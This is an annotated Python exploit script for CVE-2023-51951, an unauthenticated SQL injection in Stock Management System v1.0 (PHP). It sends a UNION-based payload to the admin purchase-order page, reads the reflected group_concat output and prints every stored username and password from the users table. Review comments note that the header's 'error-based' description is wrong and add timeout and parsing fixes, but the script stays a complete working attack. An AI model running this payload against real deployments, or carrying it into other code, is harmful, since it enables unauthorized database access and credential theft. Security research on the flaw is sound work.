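# Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection
# Date: February 6, 2024
# Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group
# Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip
# Tested on: Linux and Windows, XAMPP
# CVE-2023-51951
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack.
#
# NOTE(review): the payload used below is a UNION-based injection whose result
# is reflected into the page, not an error-based one as the description says.
# Run this only against systems you are explicitly authorized to test.

import argparse

import requests
from bs4 import BeautifulSoup

# Seconds to wait for the target (connect + read). The original script passed
# no timeout, so an unresponsive or tarpitting host would hang the run forever.
DEFAULT_TIMEOUT = 30

# Printed whenever the dump cannot be completed; kept verbatim from the original.
NO_DATA_MESSAGE = "No data could be retrieved. Try again."


def print_header():
    """Print the ANSI-coloured banner shown before the credential table."""
    print("\033[1m\nStock Management System v1.0\033[0m")
    print("\033[1mSQL Injection Exploit\033[0m")
    print("\033[96mby blu3ming\n\033[0m")


def _parse_credentials(textarea_text):
    """Split the reflected group_concat() output into (username, password) pairs.

    The payload joins rows with ',' and columns with 0x3a (':'), so the
    textarea body looks like ``user1:pw1,user2:pw2``. Only the first ':' of
    each entry is treated as the separator, and entries without one (for
    example the empty string left by a trailing comma) are skipped, so a
    single odd row no longer aborts the whole dump with a ValueError as the
    original ``username, password = user.split(':')`` did. A username that
    itself contains ':' will still be mis-split; that cannot be resolved here.

    Args:
        textarea_text: raw text of the ``remarks`` textarea.

    Returns:
        list of (username, password) tuples in page order; empty if nothing
        parseable was found.
    """
    pairs = []
    for entry in textarea_text.split(','):
        username, sep, password = entry.partition(':')
        if not sep:
            continue
        pairs.append((username, password))
    return pairs


def _report_failure(reason):
    """Print the standard "no data" line plus a short diagnostic reason."""
    print(NO_DATA_MESSAGE)
    print("Reason: {}".format(reason))


def parse_response(target_url, timeout=DEFAULT_TIMEOUT):
    """Fetch *target_url* and print every credential pair reflected in the page.

    Args:
        target_url: full URL, payload included (built by ``retrieve_data``).
        timeout: per-request timeout in seconds passed to ``requests.get``.

    Failures are reported, not raised, so the table drawn by the caller stays
    intact: transport errors, a response without the ``remarks`` textarea and
    an empty/unparseable textarea all print ``NO_DATA_MESSAGE``. Unlike the
    original bare ``except:``, KeyboardInterrupt and programming errors are
    no longer swallowed.
    """
    try:
        target_response = requests.get(target_url, timeout=timeout)
    except requests.RequestException as exc:
        _report_failure(exc)
        return

    # The injected SELECT appears to be echoed into the "remarks" textarea of
    # the manage_po page; a missing textarea usually means the target is not
    # vulnerable, is a different version, or the id parameter was rejected.
    soup = BeautifulSoup(target_response.text, 'html.parser')
    textarea = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'})
    if textarea is None:
        _report_failure('no <textarea name="remarks"> in response (HTTP {})'.format(
            target_response.status_code))
        return

    pairs = _parse_credentials(textarea.text)
    if not pairs:
        print(NO_DATA_MESSAGE)
        return
    for username, password in pairs:
        print("| {:<20} | {:<40} |".format(username, password))


def retrieve_data(base_url, timeout=DEFAULT_TIMEOUT):
    """Build the injected manage_po URL for *base_url* and print the users table.

    Args:
        base_url: scheme and host of the target, e.g. ``http://10.0.0.5``.
            The application path ``/sms`` is appended here, so do not
            include it. A trailing slash is tolerated.
        timeout: per-request timeout forwarded to ``parse_response``.
    """
    target_path = '/sms/admin/?page=purchase_order/manage_po&id='
    # UNION payload with 13 columns to match the vulnerable SELECT; the 9th
    # column carries group_concat(username, ':', password), which the script
    # reads back from the "remarks" textarea. The leading ' closes the string
    # literal and the trailing "--+-" comments out the rest of the query.
    # NOTE: group_concat() output is capped by MySQL's group_concat_max_len
    # (1024 bytes by default), so a large users table may come back truncated.
    payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-" #Dump users table
    # Strip a trailing slash so "http://host/" does not yield "http://host//sms/...".
    target_url = base_url.rstrip('/') + target_path + payload
    print("+----------------------+------------------------------------------+")
    print("| {:<20} | {:<40} |".format("username", "password"))
    print("+----------------------+------------------------------------------+")
    parse_response(target_url, timeout=timeout)
    print("+----------------------+------------------------------------------+\n")


if __name__ == "__main__":
    about = 'Unauthenticated SQL Injection Exploit - Stock Management System'
    parser = argparse.ArgumentParser(description=about)
    parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL')
    parser.add_argument('--timeout', dest='timeout', type=float, default=DEFAULT_TIMEOUT,
                        help='HTTP timeout in seconds (default: %(default)s)')
    args = parser.parse_args()
    print_header()
    retrieve_data(args.base_url, timeout=args.timeout)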